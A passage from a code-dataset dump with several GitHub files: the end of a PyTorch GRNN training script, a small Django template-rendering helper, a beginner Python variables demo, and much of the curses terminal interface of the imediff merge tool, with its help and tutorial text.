n_iter/(len(train_input_var)*n_epoch*1.)*100, print_loss_avg))\n\n if n_iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / (plot_every*1.)\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n fname = data_name + str(MAX_LENGTH)\n showPlot(plot_losses, fname + '_loss.png')\n\n torch.save(grnn.state_dict(), fname + '_model.pkl')\n\n # test\n print(\"Start Testing...\")\n test_acc_total = 0\n y_pred = []\n for i in range(len(test_input_var)):\n acc, predicted = test(grnn, test_input_var[i], test_output_label[i])\n test_acc_total += acc\n y_pred.append(predicted)\n print('acc: ' + str(test_acc_total / (len(test_input_var)*1.)))\n y_true = [label.data[0] for label in test_output_label]\n confusionMatrix(y_pred, y_true, fname +'_confusion.txt')\n","repo_name":"SnowIsWhite/EmoNet-PyTorch","sub_path":"grnn.py","file_name":"grnn.py","file_ext":"py","file_size_in_byte":6596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72282962332","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n\nclass TemplateRender(TemplateView):\n\n def get_template_names(self):\n path = self.request.path\n if path == '/':\n path = \"index.html\"\n return [f\"maqueta/{path}\"]\n\n def post(self):\n return JsonResponse({}, status=200)\n\n\ndef front_context(request):\n def looper(length):\n for loop in range(length):\n yield loop\n _loops = [\n 2, 4, 
6, 8, 10, 12, 16, 32, 64,\n 3, 5, 7, 9, 11, 13, 15, 25, 50,\n ]\n context = dict()\n for loop in _loops:\n context[f\"looper_{loop}\"] = looper(loop)\n return context\n","repo_name":"ccapudev/django-boilerplate","sub_path":"apps/core/utils/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70288618651","text":"\nx = 2\ny = 3\nz = x + y\nprint(\"Ther result: \", z)\n\ns = 'Mahmoud'\nl = 'Salem'\nprint(\"My name is\", s, l)\n\nprint(s[0], l[0], l[1:4], s[3:])\n\n","repo_name":"ma7salem/python-fundamentals","sub_path":"#1 variable/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12723525747","text":"import curses\n\nfrom imediff.utils import _, console_width, error_exit, logger, write_file\nfrom imediff.config import cc\nfrom imediff.cli import *\n\n# Format stings\n_helptext2 = _(\n \"\"\"\\\n Interactive Merge Editor to merge 2 DIFFerent files\n\nimediff merges 2 different input files using 5 modes:\n * mode a: display {file_a} (older) in {color_a}\n * mode b: display {file_b} (newer) in {color_b}\n * mode d: display diff2(a,b) by line in {color_d}\n * mode e: display editor result buffer in {color_e}\n * mode f: display wdiff2(a,b) by character in {color_f}\n\nkey commands induced actions\n{w:c},{x:c} write and exit\n{q:c} quit without saving\n{a:c}/{b:c}/{d:c}/{e:c}/{f:c} set a chunk to a/b/d/e/f mode\n1/2/4/5/6 set a chunk to a/b/d/e/f mode (alternative)\n{A:c}/{B:c}/{D:c}/{E:c}/{F:c} set all chunks to a/b/d/e/f mode\nenter toggle mode of a chunk\n{m:c} modify a chunk with editor: {edit_cmd}\n{M:c} remove a editor result buffer\narrows/pgdn,{j:c}/pgup,{k:c} move scope of the display\nspace,{n:c} /backspace,{p:c} select the next/previous chunk\ntab,{N:c} /shift-tab,{P:c} select the next/previous diff chunk\nhome,{t:c} /end,{z:c} select the first/last chunk\n{T:c} /{Z:c} select the first/last diff chunk\n?,{s:c} show the state of the merge\n{h:c} show this help\n{H:c} show tutorial\"\"\"\n)\n\n_helptext3 = _(\n \"\"\"\\\n Interactive Merge Editor to merge 3 DIFFerent files\n\nimediff merges 3 different input files using 7 modes:\n * mode a: display {file_a} (yours) in {color_a}\n * mode b: display {file_b} (base) in {color_b}\n * mode c: display {file_c} (their) in {color_c}\n * mode d: display diff3(a,b,c) by line in {color_d}\n * mode e: display editor result buffer in {color_e}\n * mode f: display wdiff3(a,b,c) by character in {color_f}\n * mode g: set good mode from (a,b,c,e,g) if merged cleanly, or\n set mode (df) in case of conflicts\n\nkey commands induced actions\n{w:c},{x:c} write and exit\n{q:c} quit without saving\n{a:c}/{b:c}/{c:c}/{d:c}/{e:c}/{f:c}/{g:c} set a chunk to a/b/c/d/e/f/g mode\n1/2/3/4/5/6/7 set a chunk to a/b/c/d/e/f/g mode (alternative)\n{A:c}/{B:c}/{C:c}/{D:c}/{E:c}/{F:c}/{G:c} set all chunks to a/b/c/d/e/f/g mode\nenter toggle mode of a chunk\n{m:c} modify a chunk with editor: {edit_cmd}\n{M:c} remove a editor result buffer\narrows/pgdn,{j:c}/pgup,{k:c} move scope of the display\nspace,{n:c} /backspace,{p:c} select the next/previous chunk\ntab,{N:c} /shift-tab,{P:c} select the next/previous diff chunk\nhome,{t:c} /end,{z:c} select the first/last chunk\n{T:c} /{Z:c} select the first/last diff chunk\n?,{s:c} show the state of the merge\n{h:c} show this help\n{H:c} show 
tutorial\"\"\"\n)\n\n_stattext0 = _(\n \"\"\"\\\nChunk index = (all files are identical)\nLine index ={row: 5d} (total ={conth: 5d})\nColumn offset ={col: 5d}\"\"\"\n)\n\n_stattext1 = _(\n \"\"\"\\\nChunk index ={active: 5d} (total ={total: 5d}, unresolved ={unresolved: 5d})\nLine index ={row: 5d} (total ={conth: 5d})\nColumn offset ={col: 5d}\"\"\"\n)\n\n# Keep this under 74 char/line for better looks\n_nonclean = _(\n \"\"\"\\\nThis requirement of the clean merge for 'save and exit' can be disabled by\nspecifying the \"--sloppy\" option to the imediff command. Alternatively,\nyou can effectively evade this requirement by pressing \"m\" on all\nnon-clean merges to make them as the manually edited text data.\"\"\"\n)\n\n# Keep this under 74 char/line for better looks\n# I need this hack to avoid translation of tutorial for now. XXX FIXME XXX\nnonclean = \"\"\"\\\nThis requirement of the clean merge for 'save and exit' can be disabled by\nspecifying the \"--sloppy\" option to the imediff command. Alternatively,\nyou can effectively evade this requirement by pressing \"m\" on all\nnon-clean merges to make them as the manually edited text data.\"\"\"\n\n\n# Keep this under 76 char/line to fit this in the 80 char terminal\n_tutorial = \"\"\"\\\nQuick start:\n In this tutorial screen, use pgdn/pgup/arrows keys to read it, or\n type other keys to return to the main imediff screen.\n\n---------------------------------------------------------------------------\n Tutorial for imediff (Interactive Merge Editor)\n Copyright (C) 2021 Osamu Aoki \n---------------------------------------------------------------------------\n\nThe imediff command helps you to merge 2 slightly different files with an\noptional base file interactively using the in-place alternating display of\nthe changed content on a single-pane full screen terminal user interface.\n\nThe source of line is clearly identified by the color of the line or the\nidentifier character at the first column.\n\nThe advantage of this user interface is the minimal movement of the line of\nsight for the user. Other great tools such as vimdiff, xxdiff, meld and\nkdiff3 require you to look at different points of display to find the exact\nposition of changes. This makes imediff the most stress-free tool. (I\nrealized this when I first used the original imediff2 program by Jarno\nElonen . Please note that the command name is changed from\nimediff2 to imediff now.)\n\nOther great tools for merge such as \"diff3 -m ...\" and \"git merge ...\"\noperate only on the difference by line. So even for the non-overlapping\nchanges, they yield the merge conflict if changes happen on the same line.\n\nThe automatic merge logic of the imediff command operates not only on the\ndifference by line but on the difference by character. This is another\ngreat feature of the imediff command. So for the non-overlapping changes, it\nalways yields the clean merge (mode \"g\").\n\nMerge with 2 files\n==================\n\nLet's try to merge 2 almost identical files, \"file_a\" and \"file_b\", into an\noutput file, \"file_o\". You can do this with the following.\n\n $ imediff -o file_o file_a file_b\n\nThis starts a full screen display of the content of the intended output\n\"file_o\". Initially all the different lines in \"file_a\" and \"file_b\" are\ngrouped in chunks and displayed in mode \"d\" which combines the corresponding\n\"file_a\" and \"file_b\" content by line.\n\nYou can move the focused chunk to the next chunk by pressing \"Space\", or \"n\"\nkeys. 
You can move the focused chunk to the previous chunk by pressing\n\"Back Space\", or \"p\" keys.\n\nYou can set the display mode of the focused chunk with the corresponding\nsingle key command. Pressing \"a\" displays the \"file_a\" content. Pressing\n\"b\" displays the \"file_b\" content.\n\nBy alternating \"a\" and \"b\" keys, you can see the difference in place which\nis easy on you with the constant line of sight. (This is the same great\nfeature inherited from the original imediff2 program.)\n\nYou can display both the \"file_a\" content and the \"file_b\" content with 2\nkey commands. Pressing \"d\" displays 2 blocks of lines organized somewhat\nlike \"diff -u\" (mode \"d\"). Pressing \"f\" displays intermixed 1 block of\nlines organized somewhat like \"wdiff\" (mode \"f\").\n\nPressing \"m\" starts an editor to edit the focused chunk from any modes to\ncreate a manually merged content. Upon exiting the editor, its result is\nkept in the editor result buffer. Even after pressing \"a\", \"b\", \"d\", or\n\"f\", the content of the editor result buffer can be recalled and displayed\nby pressing \"e\".\n\nPressing \"M\" in mode \"e\" removes the editor result buffer.\n\nWhen you press one of the upper case \"A\", \"B\", \"D\", \"E\", \"F\", this sets\nall chunks to the corresponding lower case mode.\n\nAll parts of imediff data normally need to select \"a\", \"b\", or \"e\" (excluding\n\"d\" and \"f\") before writing the merge result unless \"--sloppy\" is specified\nbefore writing the result. Type \"w\" or \"x\" to write the displayed content to\n\"file_o\" and exit the imediff program.\n\n{}\n\nAlthough the imediff program is practically WYSIWYG, there is one notable\nexception. For the deleted content in mode \"a\" or \"b\", the imediff program\ndisplays \"???\" in reverse mode as a placeholder. This \"???\" is not included\nin the output file.\n\nMerge with 3 files\n==================\n\nLet's try to merge 2 almost identical files, \"file_a\" and \"file_c\", both of\nwhich are based on the file, \"file_b\", into an output file, \"file_o\". You\ncan do this with the following.\n\n $ imediff -o file_o file_a file_b file_c\n\nThis starts a full screen display of the intended merged output content\n\"file_o\". Unlike \"Merge with 2 files\", the existence of the common base\nfile \"file_b\" allows the imediff program to chose desirable chunks\nautomatically from the corresponding \"file_a\" or \"file_c\" contents like\n\"diff3 -m\" or \"git merge\".\n\nActually, this imediff program does more. This imediff program merges not\nonly with comparison by the line like other tools but also comparison by the\ncharacter. This allows the clean automatic merge even when changes happen\non different positions of the same line of \"file_a\" and \"file_c\" derived\nfrom \"file_b\".\n\nOnly really unresolved chunks are displayed in mode \"d\". You can move the\nfocused chunk to the next unresolved chunk by pressing \"Tab\", or \"N\" keys.\nPressing \"m\" starts an editor to create a manually merged content. You can\nmove the focused chunk to the previous unresolved chunk by pressing\n\"Shift-Tab\", or \"P\" keys.\n\nThe key binding for \"Merge with 3 files\" is almost the same as that for\n\"Merge with 2 files\". There are 2 notable extensions. Pressing \"c\"\ndisplays the \"file_c\" content. 
Pressing \"g\" causes automatic merge efforts\non a chunk for 3 files in the following order:\n * If the editor result buffer has content, mode is set to \"e\".\n * If a chunk is resolved cleanly, mode is set to \"a\", \"c\", or \"g\".\n This overrides previous manual settings such as \"a\", \"b\", or \"c\".\n * If a chunk isn't resolved cleanly, mode is left as mode \"d\" or \"f\".\n\nBy alternating \"a\" and \"c\" keys, you can see the difference in place.\n\nAll parts of imediff data normally need to select \"a\", \"b\", \"c\", \"g\" or \"e\"\n(excluding \"d\" and \"f\") before writing the merge result unless \"--sloppy\" is\nspecified before writing the result.\n\nThe rests are mostly the same as \"Merge with 2 files\".\n\nTerminal\n========\n\nThe imediff program is compatible with any terminal window sizes. It\nsupports both monochrome and color terminals. For comfortable user\nexperience, terminal width of 80 characters/line or more and terminal height\nof 24 lines or more are desirable.\n\nWhen mode column is enabled by \"-m\" option or monochrome terminal is used,\nthe first column is used to indicate the match type of each un-selectable\nmatched section or display mode of each selectable unmatched chunk.\n * \"=\" for a un-selectable section means unchanged source files: a==b==c.\n (Under the color terminal, this is displayed in white/normal.)\n * \"#\" for a un-selectable section means matched and changed files: a==c and\n a!=b. (Under the color terminal, this is displayed in white/bold.)\n * \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", and \"g\" for selectable unmatched chunk are\n the display mode of each chunk. (Under the color terminal, these are\n displayed in different colors.)\n\nCustomization\n=============\n\nThe imediff program can customize its key binding and its color setting with\nthe \"~/.imediff\" file in the ini file format. You can create its template\nfile by the \"imediff -t\" command.\n\nYou can disable an existing \"~/.imediff\" file without renaming it by\nspecifying a non-existing file, e.g., \"BOGUS\" as \"imediff -C BOGUS ...\".\nThe internal default values of the imediff program are used.\n\nNote\n====\n\nSome keys are aliased for \"Merge with 2 files\" for your convenience:\n * \"c\" works as \"d\"\n * \"g\" works as \"e\"\n\nThe \"diff3 -m\" has an odd feature for the merge when \"file_a\" and \"file_c\"\nundergo identical changes from \"file_b\". 
This imediff program results in a\nmore intuitive merge result.\"\"\".format(\n nonclean\n)\n\n\nclass TextPad(TextData): # TUI data\n \"\"\"Curses class to handle diff data for 2 or 3 lines\"\"\"\n\n # persistent variables: self.*\n # stdscr: display object\n # winh, winw: Window height and width from stdscr.getmaxyx()\n # conth, contw: Content height and width of textpad\n # row, col: window top left position in textpad\n # active: index for self.actives\n # non-persistent running variables\n # i: index as self.opcodes[i]\n # j: index as self.actives[j]\n def __init__(self, list_a, list_b, list_c, args, confs):\n # Init from super class \"TextData\"\n super().__init__(list_a, list_b, list_c, args, confs)\n # Init from commandline/configuration parameters\n self.mode = args.mode\n self.mono = args.mono\n if self.diff_mode == 2:\n self.color = confs[\"color_diff2\"]\n else:\n self.color = confs[\"color_diff3\"]\n return\n\n def command_loop(self, tutorial=False): # for curses TUI (wrapper)\n self.tutorial = tutorial\n curses.wrapper(self.gui_loop)\n return\n\n def gui_loop(self, stdscr): # for curses TUI (core)\n # initialize\n self.stdscr = stdscr\n color = self.color # shorthand\n self.winh, self.winw = self.stdscr.getmaxyx() # window size\n curses.start_color()\n self.stdscr.clear()\n self.stdscr.refresh()\n # set color pair_number as (pair_number, fg, bg)\n curses.init_pair(1, cc[color[\"color_a\"]], cc[\"BLACK\"])\n curses.init_pair(2, cc[color[\"color_b\"]], cc[\"BLACK\"])\n curses.init_pair(3, cc[color[\"color_c\"]], cc[\"BLACK\"])\n curses.init_pair(4, cc[color[\"color_d\"]], cc[\"BLACK\"])\n curses.init_pair(5, cc[color[\"color_e\"]], cc[\"BLACK\"])\n curses.init_pair(6, cc[color[\"color_f\"]], cc[\"BLACK\"])\n #\n # +6: active cc\n self.active_color = 6\n curses.init_pair(7, cc[\"WHITE\"], cc[color[\"color_a\"]])\n curses.init_pair(8, cc[\"WHITE\"], cc[color[\"color_b\"]])\n curses.init_pair(9, cc[\"WHITE\"], cc[color[\"color_c\"]])\n curses.init_pair(10, cc[\"WHITE\"], cc[color[\"color_d\"]])\n curses.init_pair(11, cc[\"WHITE\"], cc[color[\"color_e\"]])\n curses.init_pair(12, cc[\"WHITE\"], cc[color[\"color_f\"]])\n #\n # +12: deleted cc\n self.deleted_color = 12\n curses.init_pair(13, cc[color[\"color_a\"]], cc[\"WHITE\"])\n curses.init_pair(14, cc[color[\"color_b\"]], cc[\"WHITE\"])\n curses.init_pair(15, cc[color[\"color_c\"]], cc[\"WHITE\"])\n curses.init_pair(16, cc[color[\"color_d\"]], cc[\"WHITE\"])\n curses.init_pair(17, cc[color[\"color_e\"]], cc[\"WHITE\"])\n curses.init_pair(18, cc[color[\"color_f\"]], cc[\"WHITE\"])\n #\n # +6+12\n curses.init_pair(19, cc[\"BLACK\"], cc[color[\"color_a\"]])\n curses.init_pair(20, cc[\"BLACK\"], cc[color[\"color_b\"]])\n curses.init_pair(21, cc[\"BLACK\"], cc[color[\"color_c\"]])\n curses.init_pair(22, cc[\"BLACK\"], cc[color[\"color_d\"]])\n curses.init_pair(23, cc[\"BLACK\"], cc[color[\"color_e\"]])\n curses.init_pair(24, cc[\"BLACK\"], cc[color[\"color_f\"]])\n #\n if curses.has_colors() == False:\n self.mono = True\n if self.mono:\n self.mode = True\n self.color_a = \"WHITE\"\n self.color_b = \"WHITE\"\n self.color_c = \"WHITE\"\n self.color_d = \"WHITE\"\n self.color_e = \"WHITE\"\n self.color_f = \"WHITE\"\n else:\n if self.diff_mode == 2:\n self.color_a = color[\"color_a\"]\n self.color_b = color[\"color_b\"]\n # self.color_c = color['color_c'] # never used\n self.color_d = color[\"color_d\"]\n self.color_e = color[\"color_e\"]\n self.color_f = color[\"color_f\"]\n else:\n self.color_a = color[\"color_a\"]\n self.color_b = 
color[\"color_b\"]\n self.color_c = color[\"color_c\"]\n self.color_d = color[\"color_d\"]\n self.color_e = color[\"color_e\"]\n self.color_f = color[\"color_f\"]\n # display parameters\n self.col = 0 # the column coordinate of textpad (left most=0)\n self.row = 0 # the row coordinate of textpad (top most=0)\n self.update_textpad = True # update textpad content\n while True:\n if self.active is not None:\n logger.debug(\n \"command loop: active = {} active_index = {} row = {} col = {}\".format(\n self.active, self.actives[self.active], self.row, self.col\n )\n )\n else:\n logger.debug(\n \"command loop: active = ***None*** row = {} col = {}\".format(\n self.row, self.col\n )\n )\n curses.curs_set(0)\n if self.update_textpad:\n self.new_textpad()\n # clear to remove garbage outside of textpad\n self.winh, self.winw = self.stdscr.getmaxyx()\n self.adjust_window()\n for icol in range(self.contw - self.col, self.winw):\n self.stdscr.vline(0, icol, \" \", self.winh)\n ##self.stdscr.vline(0, self.contw - self.col, '@', self.winh)\n ##self.stdscr.vline(0, self.winw-1, '*', self.winh)\n # clear rows downward to remove garbage characters\n for irow in range(self.conth - self.row, self.winh):\n self.stdscr.hline(irow, 0, \" \", self.winw)\n ##if (self.conth - self.row) <= self.winh -1 and (self.conth - self.row) >= 0:\n ## self.stdscr.hline(self.conth - self.row , 0, '@', self.winw)\n if self.update_textpad or self.update_active:\n self.highlight()\n self.textpad.refresh(self.row, self.col, 0, 0, self.winh - 1, self.winw - 1)\n if self.active is not None:\n row = self.get_row(self.actives[self.active]) - self.row\n if row >= 0 and row < self.winh:\n self.stdscr.move(row, 0)\n curses.curs_set(1)\n else:\n curses.curs_set(0)\n self.stdscr.refresh()\n # reset flags\n self.update_textpad = False\n self.update_active = False\n if self.tutorial:\n c = ord(\"H\")\n self.tutorial = False\n else:\n c = self.getch_translated()\n ch = chr(c)\n if ch == \"w\" or ch == \"x\" or c == curses.KEY_EXIT or c == curses.KEY_SAVE:\n if self.sloppy or (\n not self.sloppy and self.get_unresolved_count() == 0\n ):\n if not self.confirm_exit or self.popup(\n _(\"Do you 'save and exit'? (Press '{y:c}' to exit)\").format(\n y=self.rkc[\"y\"]\n )\n ):\n output = self.get_output()\n write_file(self.file_o, output)\n break\n else:\n self.popup(\n _(\n \"Can't 'save and exit' due to the non-clean merge. (Press '{y:c}' to continue)\"\n + \"\\n\\n\"\n + _nonclean\n ).format(y=self.rkc[\"y\"])\n )\n elif ch == \"q\":\n if not self.confirm_exit or self.popup(\n _(\"Do you 'quit without saving'? 
(Press '{y:c}' to quit)\").format(\n y=self.rkc[\"y\"]\n )\n ):\n self.opcodes = []\n error_exit(\"Quit without saving by the user request\\n\")\n elif ch == \"h\" or c == curses.KEY_HELP:\n # Show help screen\n self.popup(self.helptext())\n elif ch == \"H\":\n # Show tutorial screen\n self.popup(_tutorial)\n elif ch == \"s\" or ch == \"?\":\n # Show location\n if len(self.actives) == 0:\n self.popup(\n _stattext0.format(row=self.row, conth=self.conth, col=self.col)\n )\n else:\n self.popup(\n _stattext1.format(\n active=self.active,\n total=len(self.actives),\n unresolved=self.get_unresolved_count(),\n row=self.row,\n conth=self.conth,\n col=self.col,\n )\n )\n # Moves in document\n elif c == curses.KEY_SR or c == curses.KEY_UP or ch == \"k\":\n self.row -= 1\n elif c == curses.KEY_SF or c == curses.KEY_DOWN or ch == \"j\":\n self.row += 1\n elif c == curses.KEY_LEFT:\n self.col -= 8\n elif c == curses.KEY_RIGHT:\n self.col += 8\n elif c == curses.KEY_PPAGE:\n self.row -= self.winh\n elif c == curses.KEY_NPAGE:\n self.row += self.winh\n # Terminal resize signal\n elif c == curses.KEY_RESIZE:\n self.winh, self.winw = self.stdscr.getmaxyx()\n else:\n pass\n # Following key-command updates TextPad\n if self.active is not None:\n # get active chunk\n # Explicitly select chunk mode\n if ch in \"abdef\":\n self.set_mode(self.actives[self.active], ch)\n elif ch in \"12456\":\n self.set_mode(\n self.actives[self.active], chr(ord(ch) - ord(\"1\") + ord(\"a\"))\n )\n elif ch in \"ABDEF\":\n self.set_all_mode(ch.lower())\n elif ch in \"cg\" and self.diff_mode == 3:\n self.set_mode(self.actives[self.active], ch)\n elif ch in \"37\" and self.diff_mode == 3:\n self.set_mode(\n self.actives[self.active], chr(ord(ch) - ord(\"1\") + ord(\"a\"))\n )\n elif ch in \"CG\" and self.diff_mode == 3:\n self.set_all_mode(ch.lower())\n elif c == 10 or c == curses.KEY_COMMAND:\n mode = self.get_mode(self.actives[self.active])\n if mode == \"a\":\n self.set_mode(self.actives[self.active], \"b\")\n elif mode == \"b\" and self.diff_mode == 2:\n self.set_mode(self.actives[self.active], \"d\")\n elif mode == \"b\" and self.diff_mode == 3:\n self.set_mode(self.actives[self.active], \"c\")\n elif mode == \"c\":\n self.set_mode(self.actives[self.active], \"d\")\n elif (\n mode == \"d\"\n and self.get_bf(self.actives[self.active]) is not None\n ):\n self.set_mode(self.actives[self.active], \"e\")\n elif mode == \"d\":\n self.set_mode(self.actives[self.active], \"f\")\n elif mode == \"e\":\n self.set_mode(self.actives[self.active], \"f\")\n else: # f\n self.set_mode(self.actives[self.active], \"a\")\n elif ch == \"m\":\n self.editor(self.actives[self.active])\n elif ch == \"M\" and mode == \"e\":\n self.del_editor(self.actives[self.active])\n elif ch == \"n\" or c == curses.KEY_NEXT or ch == \" \":\n self.active_next()\n elif ch == \"p\" or c == curses.KEY_PREVIOUS or c == curses.KEY_BACKSPACE:\n self.active_prev()\n elif ch == \"t\" or c == curses.KEY_HOME:\n self.active_home()\n elif ch == \"z\" or c == curses.KEY_END:\n self.active_end()\n elif ch == \"N\" or ch == \"\\t\":\n self.diff_next()\n elif ch == \"P\" or c == curses.KEY_BTAB:\n self.diff_prev()\n elif ch == \"T\":\n self.diff_home()\n elif ch == \"Z\":\n self.diff_end()\n else:\n pass\n logger.debug(\"command-loop\")\n return\n\n def new_textpad(self):\n \"\"\"Create new curses textpad\"\"\"\n # pre-scan content to get big enough textpad size\n conth = 0 # content height\n contw = 0 # content width\n for i in range(len(self.opcodes)):\n self.set_row(i, conth) # 
record textpad row position in chunk\n tag = self.get_tag(i)\n content = self.get_content(i) # list()\n conth += len(content)\n if tag == \"E\" or tag == \"e\":\n pass\n else:\n if len(content) == 0:\n conth += 1\n for line in content:\n contw = max(contw, console_width(line))\n if self.mode: # Add mode column\n contw += 2 # for the tag indicator + ' '\n self.conth = conth\n self.contw = contw\n # actual textpad size slightly bigger for safety margin\n self.textpad = curses.newpad(conth + 1, max(80, contw + 1))\n for i in range(len(self.opcodes)):\n self.textpad_addstr(i, False)\n if self.active is not None:\n logger.debug(\n \"gui init: active={} chunk_index={} row={} col={} conth={} contw={}\".format(\n self.active,\n self.actives[self.active],\n self.row,\n self.col,\n self.conth,\n self.contw,\n )\n )\n return\n\n def textpad_addstr(self, i, selected=False):\n tag = self.get_tag(i)\n mode = self.get_mode(i)\n if tag == \"E\": # Same a = b = c\n decor = curses.A_DIM\n color_pair = 0\n prefix = \"= \"\n elif tag == \"e\": # Same a = c\n decor = curses.A_BOLD\n color_pair = 0\n prefix = \"# \"\n elif mode == \"a\": # diff2 OLD /diff3: YOURS NEW\n decor = curses.A_BOLD\n color_pair = 1\n prefix = mode + \" \"\n elif mode == \"b\": # diff2 NEW /diff3: common OLD\n decor = curses.A_BOLD\n color_pair = 2\n prefix = mode + \" \"\n elif mode == \"c\": # diff2 --- /diff3: THEIRS NEW\n decor = curses.A_BOLD\n color_pair = 3\n prefix = mode + \" \"\n elif mode == \"d\": # diff\n decor = curses.A_BOLD\n color_pair = 4\n prefix = mode + \" \"\n elif mode == \"e\": # edit buffer\n decor = curses.A_BOLD\n color_pair = 5\n prefix = mode + \" \"\n elif mode == \"f\": # wdiff\n decor = curses.A_BOLD\n color_pair = 6\n prefix = mode + \" \"\n else: # 'g': # wdiff, cleanly merged\n decor = curses.A_BOLD\n decor |= curses.A_REVERSE\n color_pair = 6\n prefix = mode + \" \"\n row = self.get_row(i)\n content = self.get_content(i) # list()\n # Decorative \"???\" for deleted lines only for display\n if len(content) == 0 and tag not in \"Ee\":\n content = [\"???\"] # override []\n if self.mono:\n decor |= curses.A_REVERSE\n else:\n color_pair += self.deleted_color\n if selected:\n color_pair += self.active_color\n decor |= curses.A_REVERSE\n for line in content:\n # logger.debug(\"textpad.addstr, >>> row={} line={} decor={} color_pair={}\".format(row, line[:-1], decor , color_pair))\n if self.mono:\n self.textpad.addstr(row, 0, prefix + line, decor)\n elif self.mode:\n self.textpad.addstr(\n row, 0, prefix + line, decor | curses.color_pair(color_pair)\n )\n else:\n self.textpad.addstr(row, 0, line, decor | curses.color_pair(color_pair))\n row += 1\n return\n\n def adjust_window(self):\n \"\"\"Clamp window scope to have cursor within window and content\"\"\"\n # row, col -> index: first column/line = 0\n # winh, winw -> number: first column/line = 1\n # conth, contw -> number: first column/line = 1\n context_length = 10\n self.winh, self.winw = self.stdscr.getmaxyx()\n if self.update_active and self.active is not None:\n selected_row = self.get_row(self.actives[self.active])\n if self.row >= selected_row - context_length:\n self.row = selected_row - context_length\n if self.row <= selected_row - self.winh + context_length:\n self.row = selected_row - self.winh + context_length\n # clamp cursor col/row within data\n if self.row >= self.conth - self.winh:\n self.row = self.conth - self.winh\n if self.row < 0:\n self.row = 0\n if self.col >= self.contw - 1:\n self.col = self.contw - 1\n if self.col < 0:\n self.col = 
0\n logger.debug(\n \"adjust_window: conth={} contw={} winh={} winw={} row={}, col={}\".format(\n self.conth, self.contw, self.winh, self.winw, self.row, self.col\n )\n )\n return\n\n def highlight(self):\n \"\"\"Update textpad by repainting active highlight\"\"\"\n if self.active is None:\n # No diff --> No highlight action\n # Avoid out of range for self.active, self.active_old\n # This makes highlight more robust and easy to use\n pass\n else:\n if self.active != self.active_old and self.active_old is not None:\n # Repaint old selection without highlighting\n self.textpad_addstr(self.actives[self.active_old], selected=False)\n self.textpad_addstr(self.actives[self.active], selected=True)\n return\n\n def set_mode(self, i, new_mode):\n super().set_mode(i, new_mode)\n self.update_textpad = True\n return\n\n def getch_translated(self):\n \"\"\"Macro parsing instead of curses getch\"\"\"\n if len(self.macro):\n c = ord(self.macro[:1])\n c = self.c_translated(c)\n if c == ord(\":\"):\n try:\n c = self.stdscr.getch()\n except:\n c = ord(\"q\") # quit w/o saving for ^C\n c = self.c_translated(c)\n else:\n self.macro = self.macro[1:]\n else:\n c = 0 # End of MACRO\n return c\n\n def popup(self, text):\n self.winh, self.winw = self.stdscr.getmaxyx()\n popupw = 0\n popuph = 0\n for line in text.split(\"\\n\"):\n popupw = max(popupw, console_width(line))\n popuph += 1\n popuph = popuph + 2 # top/bottom border\n popupw = popupw + 4 # left/right (border + space)\n popuppad = curses.newpad(popuph, popupw)\n for i, line in enumerate(text.split(\"\\n\")):\n popuppad.addstr(1 + i, 2, line, curses.A_BOLD)\n popuppad.border()\n poprow = 0\n popcol = 0\n curses.curs_set(0)\n while True:\n self.winh, self.winw = self.stdscr.getmaxyx()\n popwinh = min(popuph, self.winh)\n popwinw = min(popupw, self.winw)\n self.textpad.refresh(self.row, self.col, 0, 0, self.winh - 1, self.winw - 1)\n # logger.debug(\"popup before >>> poprow={} popcol={} popupw={} popwinw={}\".format(poprow, popcol, popupw, popwinw))\n if poprow <= 0:\n poprow = 0\n if poprow >= popuph - popwinh:\n poprow = popuph - popwinh\n if popcol <= 0:\n popcol = 0\n if popcol >= popupw - popwinw:\n popcol = popupw - popwinw\n popuppad.refresh(\n poprow,\n popcol,\n max((self.winh - popwinh) // 2, 0),\n max((self.winw - popwinw) // 2, 0),\n min((self.winh + popwinh + 1) // 2 - 1, self.winh - 1),\n min((self.winw + popwinw + 1) // 2 - 1, self.winw - 1),\n )\n self.stdscr.refresh()\n c = self.getch_translated()\n ch = chr(c)\n # Moves in document\n if c == curses.KEY_SR or c == curses.KEY_UP or ch == \"k\":\n poprow -= 1\n elif c == curses.KEY_SF or c == curses.KEY_DOWN or ch == \"j\":\n poprow += 1\n elif c == curses.KEY_LEFT:\n popcol -= 1\n elif c == curses.KEY_RIGHT:\n popcol += 1\n elif c == curses.KEY_PPAGE:\n poprow -= popwinh\n elif c == curses.KEY_NPAGE:\n poprow += popwinh\n # Terminal resize signal\n elif c == curses.KEY_RESIZE:\n self.winh, self.winw = self.stdscr.getmaxyx()\n elif c == ord(\"y\") or c == ord(\"y\") - 32:\n result = True\n break\n else:\n result = False\n break\n self.stdscr.refresh()\n return result\n\n def editor(self, i):\n # logger.debug(\"Before invoking editor\")\n self.stdscr.keypad(0)\n curses.savetty()\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n super().editor(i)\n curses.cbreak()\n curses.noecho()\n curses.resetty()\n self.stdscr.keypad(True) # keys processed by curses (again)\n self.stdscr.clear()\n self.stdscr.refresh()\n # logger.debug(\"After invoking editor\")\n return\n\n def helptext(self):\n if 
